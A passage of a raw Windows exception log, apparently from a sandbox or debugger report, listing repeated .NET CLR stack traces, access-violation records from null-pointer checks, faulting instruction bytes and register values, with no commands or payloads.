LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x48208 CorDllMainForThunk-0x442f3 clr+0x10d281 @ 0x6ed0d281
DllGetClassObjectInternal+0x48159 CorDllMainForThunk-0x443a2 clr+0x10d1d2 @ 0x6ed0d1d2
DllGetClassObjectInternal+0x47f09 CorDllMainForThunk-0x445f2 clr+0x10cf82 @ 0x6ed0cf82
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 e8 ad 60 0a 6d 89 45 bc 8b 55 bc b9 b0 af
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xd2aa84
registers.esp: 108256996
registers.edi: 108261460
registers.eax: 0
registers.ebp: 108261468
registers.edx: 43379776
registers.ebx: 43781120
registers.esi: 43293608
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xd2ab4b
0xd2558c
0xd25377
0xd2c667
0xd2c616
mscorlib+0x32de48 @ 0x6de8de48
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x32dd91 @ 0x6de8dd91
mscorlib+0x32dc4c @ 0x6de8dc4c
mscorlib+0x32db05 @ 0x6de8db05
mscorlib+0x32d9c8 @ 0x6de8d9c8
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4825c CorDllMainForThunk-0x4429f clr+0x10d2d5 @ 0x6ed0d2d5
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x48208 CorDllMainForThunk-0x442f3 clr+0x10d281 @ 0x6ed0d281
DllGetClassObjectInternal+0x48159 CorDllMainForThunk-0x443a2 clr+0x10d1d2 @ 0x6ed0d1d2
DllGetClassObjectInternal+0x47f09 CorDllMainForThunk-0x445f2 clr+0x10cf82 @ 0x6ed0cf82
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 e8 a0 63 0a 6d 89 45 c8 83 7d c8 00 74 1f
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xd2a791
registers.esp: 108261396
registers.edi: 108261460
registers.eax: 0
registers.ebp: 108261468
registers.edx: 43331156
registers.ebx: 43781120
registers.esi: 43293608
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xd2ab4b
0xd2558c
0xd25377
0xd2c667
0xd2c616
mscorlib+0x32de48 @ 0x6de8de48
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x32dd91 @ 0x6de8dd91
mscorlib+0x32dc4c @ 0x6de8dc4c
mscorlib+0x32db05 @ 0x6de8db05
mscorlib+0x32d9c8 @ 0x6de8d9c8
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4825c CorDllMainForThunk-0x4429f clr+0x10d2d5 @ 0x6ed0d2d5
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x48208 CorDllMainForThunk-0x442f3 clr+0x10d281 @ 0x6ed0d281
DllGetClassObjectInternal+0x48159 CorDllMainForThunk-0x443a2 clr+0x10d1d2 @ 0x6ed0d1d2
DllGetClassObjectInternal+0x47f09 CorDllMainForThunk-0x445f2 clr+0x10cf82 @ 0x6ed0cf82
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 e8 2d 63 0a 6d 89 45 bc 8b 55 bc b9 b0 af
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xd2a804
registers.esp: 108256996
registers.edi: 108261460
registers.eax: 0
registers.ebp: 108261468
registers.edx: 43331156
registers.ebx: 43781120
registers.esi: 43293608
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xd2ad75
0xd255af
0xd25377
0xd2c667
0xd2c616
mscorlib+0x32de48 @ 0x6de8de48
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x32dd91 @ 0x6de8dd91
mscorlib+0x32dc4c @ 0x6de8dc4c
mscorlib+0x32db05 @ 0x6de8db05
mscorlib+0x32d9c8 @ 0x6de8d9c8
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4825c CorDllMainForThunk-0x4429f clr+0x10d2d5 @ 0x6ed0d2d5
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x48208 CorDllMainForThunk-0x442f3 clr+0x10d281 @ 0x6ed0d281
DllGetClassObjectInternal+0x48159 CorDllMainForThunk-0x443a2 clr+0x10d1d2 @ 0x6ed0d1d2
DllGetClassObjectInternal+0x47f09 CorDllMainForThunk-0x445f2 clr+0x10cf82 @ 0x6ed0cf82
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 e8 a0 63 0a 6d 89 45 c8 83 7d c8 00 74 1f
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xd2a791
registers.esp: 108261416
registers.edi: 108261480
registers.eax: 0
registers.ebp: 108261488
registers.edx: 43331156
registers.ebx: 43781120
registers.esi: 43293608
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xd2ad75
0xd255af
0xd25377
0xd2c667
0xd2c616
mscorlib+0x32de48 @ 0x6de8de48
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x32dd91 @ 0x6de8dd91
mscorlib+0x32dc4c @ 0x6de8dc4c
mscorlib+0x32db05 @ 0x6de8db05
mscorlib+0x32d9c8 @ 0x6de8d9c8
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4825c CorDllMainForThunk-0x4429f clr+0x10d2d5 @ 0x6ed0d2d5
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x48208 CorDllMainForThunk-0x442f3 clr+0x10d281 @ 0x6ed0d281
DllGetClassObjectInternal+0x48159 CorDllMainForThunk-0x443a2 clr+0x10d1d2 @ 0x6ed0d1d2
DllGetClassObjectInternal+0x47f09 CorDllMainForThunk-0x445f2 clr+0x10cf82 @ 0x6ed0cf82
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 e8 2d 63 0a 6d 89 45 bc 8b 55 bc b9 b0 af
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xd2a804
registers.esp: 108257020
registers.edi: 108261480
registers.eax: 0
registers.ebp: 108261488
registers.edx: 43331156
registers.ebx: 43781120
registers.esi: 43293608
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x6bbdaf7
mscorlib+0xd14496 @ 0x6e874496
0x6bbb135
0x6bb8241
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6ec02652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6ec81838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6ec81737
mscorlib+0x2d3711 @ 0x6de33711
mscorlib+0x308f2d @ 0x6de68f2d
mscorlib+0x2cb060 @ 0x6de2b060
0x6bb030c
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2abe6 @ 0x6e58abe6
mscorlib+0xa2c940 @ 0x6e58c940
mscorlib+0xa2ca0e @ 0x6e58ca0e
0xd2f9a6
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 e8 9a 19 21 67 8b f8 e9 2c fd ff ff 89 7d
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6bbf187
registers.esp: 86502028
registers.edi: 86502072
registers.eax: 44567852
registers.ebp: 86502088
registers.edx: 44567852
registers.ebx: 3
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x6bbdaf7
mscorlib+0xd14496 @ 0x6e874496
0x6bbb135
0x6bb8241
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6ec02652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6ec81838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6ec81737
mscorlib+0x2d3711 @ 0x6de33711
mscorlib+0x308f2d @ 0x6de68f2d
mscorlib+0x2cb060 @ 0x6de2b060
0x6bb030c
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2abe6 @ 0x6e58abe6
mscorlib+0xa2c940 @ 0x6e58c940
mscorlib+0xa2ca0e @ 0x6e58ca0e
0xd2f9a6
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 e8 7a 13 21 67 8b f8 e9 2c fd ff ff 89 7d
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6bbf7a7
registers.esp: 86502028
registers.edi: 86502072
registers.eax: 44575372
registers.ebp: 86502088
registers.edx: 44575372
registers.ebx: 5
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x6bbdaf7
mscorlib+0xd14496 @ 0x6e874496
0x6bbb135
0x6bb8241
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6ec02652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6ec81838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6ec81737
mscorlib+0x2d3711 @ 0x6de33711
mscorlib+0x308f2d @ 0x6de68f2d
mscorlib+0x2cb060 @ 0x6de2b060
0x6bb030c
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2abe6 @ 0x6e58abe6
mscorlib+0xa2c940 @ 0x6e58c940
mscorlib+0xa2ca0e @ 0x6e58ca0e
0xd2f9a6
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 e8 b2 07 de 66 8b f8 e9 2c fd ff ff 89 7d
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6ff036f
registers.esp: 86502028
registers.edi: 86502072
registers.eax: 44599788
registers.ebp: 86502088
registers.edx: 44599788
registers.ebx: 9
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x6bbdaf7
mscorlib+0xd14496 @ 0x6e874496
0x6bbb135
0x6bb8241
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6ec02652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6ec81838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6ec81737
mscorlib+0x2d3711 @ 0x6de33711
mscorlib+0x308f2d @ 0x6de68f2d
mscorlib+0x2cb060 @ 0x6de2b060
0x6bb030c
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2abe6 @ 0x6e58abe6
mscorlib+0xa2c940 @ 0x6e58c940
mscorlib+0xa2ca0e @ 0x6e58ca0e
0xd2f9a6
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 e8 f5 03 de 66 8b d8 e9 1c fd ff ff e8 06
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6ff072c
registers.esp: 86502004
registers.edi: 86502004
registers.eax: 44600432
registers.ebp: 86502088
registers.edx: 44600432
registers.ebx: 10
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x6ff1790
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6ec02652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6ec81838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6ec81737
mscorlib+0x2d36ad @ 0x6de336ad
mscorlib+0x308f2d @ 0x6de68f2d
mscorlib+0x2cb060 @ 0x6de2b060
0x6bb029b
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 e8 36 ab dd 66 eb b3 eb cf 8b cb 8b d6 8b
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6ff5ffb
registers.esp: 108260060
registers.edi: 43039308
registers.eax: 43331156
registers.ebp: 108260096
registers.edx: 43331156
registers.ebx: 45271072
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x6ff1790
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6ec02652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6ec81838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6ec81737
mscorlib+0x2d36ad @ 0x6de336ad
mscorlib+0x308f2d @ 0x6de68f2d
